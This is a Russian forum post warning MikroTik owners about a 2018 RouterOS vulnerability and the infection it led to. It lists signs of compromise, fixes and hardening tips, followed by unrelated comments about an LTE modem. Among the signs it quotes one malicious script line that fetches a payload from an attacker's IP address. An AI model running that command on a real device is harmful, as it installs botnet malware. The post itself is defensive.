Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
Автор поста оценил этот комментарий

К чему это тем кому нужно это знает, вы мне лучше вот что скажите по микротику может кто нибудь знает, есть модем Yota, на старой прошивке при ребудете/включении маршрутизатора модем заводиться и адрес получает от провайдера, а на новых прошивках модем сразу не стартует, только после того как загрузился микротик модем включишь , выключишь тогда нормально адрес получает.

раскрыть ветку (17)
3
Автор поста оценил этот комментарий

Говорят, что помогает если подключить модем через юсб хаб с собственным питанием. Но это конечно так себе решение если модем висанёт.

раскрыть ветку (5)
DELETED
Автор поста оценил этот комментарий

Охрененный минус такого исполнения, что питание на юзб уже из терминала не скинешь. Нетвотч на ip модема, и при таймауте скрипт  /system routerboard usb power-reset duration=3

раскрыть ветку (2)
Автор поста оценил этот комментарий

Ну я потому и написал что так себе решение. Впринципе если сделать норм охлаждение мопеда то зависсоны сильно сократятся. Как правило виснет из-за перегрева.

раскрыть ветку (1)
DELETED
Автор поста оценил этот комментарий
Перегрев этого гумна это бич. Сон оф а бич. Облепил йопту радиаторами, даже кулер втыкал, один хрен грелась падла. Скоро буду брать sxt lte, посмотрим как на нем полет будет происходить.
Автор поста оценил этот комментарий

Годная идея, где то, когда то, тоже что такое слышал, надо попробовать.

1
Автор поста оценил этот комментарий

Зачем? Микротик давно уже умеет сам питалово на усб передёргивать.

В том числе можно написать скрипт - нет интернета - передерни модем.

DELETED
Автор поста оценил этот комментарий
А что за железка, и какой блок питания на нем?
раскрыть ветку (2)
Автор поста оценил этот комментарий

750gr3 ну блок стандартный, родной, 24 вольтовый.

раскрыть ветку (1)
DELETED
Автор поста оценил этот комментарий
Вообще странно. При посадке питания он модем вообще не видит, а у тебя внешний адрес только не получает. А на компе норм пашет? Могу только костыль предложить, не вот ем пинговать не 10.0.0.1, а какой нить адрес йопты, который доступен когда модем соединяется, и если down, сбрасывать питание по юзб. Можно ещё проверить с хабом с доп питанием. Если все ок, то мокротик питания недодает
Предпросмотр
Автор поста оценил этот комментарий

у меня похожая хрень была с модемами huawei, первые ребутов 20 не хочет модем видеть, а потом привыкает.


Могу костыль тебе посоветовать, проверять интерфейс/ip, если нет lte(ip), то сбрасывать питание usb


у тебя, кстати, не crs-125?

раскрыть ветку (7)
Автор поста оценил этот комментарий

Не модем сам определяется нормально, он только адрес не может получить, ищет ищет, включишь/выключишь, ну или просто переткнёшь получает адрес сразу.


нет 750gr3 я и на 951 пробовал такая же муть.

раскрыть ветку (6)
Автор поста оценил этот комментарий

может он ловит плохо? или с 3g на 4g переключается? У него локальный адрес есть?

раскрыть ветку (5)
Автор поста оценил этот комментарий

Я его по разному крутил и на разных местностях, ловит он там нормально, к тому же на старой прошивке то все работает да и после того как переткнёшь тоже, нет он не переключает, выставлял, без разницы не зависит от того есть ли у него адрес или нет.

раскрыть ветку (4)
Автор поста оценил этот комментарий

а если откатить на старую прошивку, то работает?

Кстати, routerboard firmware тоже обновил?

раскрыть ветку (3)
Автор поста оценил этот комментарий

Да на старой прошивке работает, проблема началась вот наверно с последних 6.41 где то, firmware да конечно тоже обновлял.

раскрыть ветку (2)
Автор поста оценил этот комментарий

Пиши им на форуме, если питание сбросить помогает, запили скрипт, который ip проверяет, если нет, то usb-power reset

раскрыть ветку (1)
Автор поста оценил этот комментарий

Да я тоже как то думал написать в поддержку, поговаривают что они даже иногда даже русский понимают.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку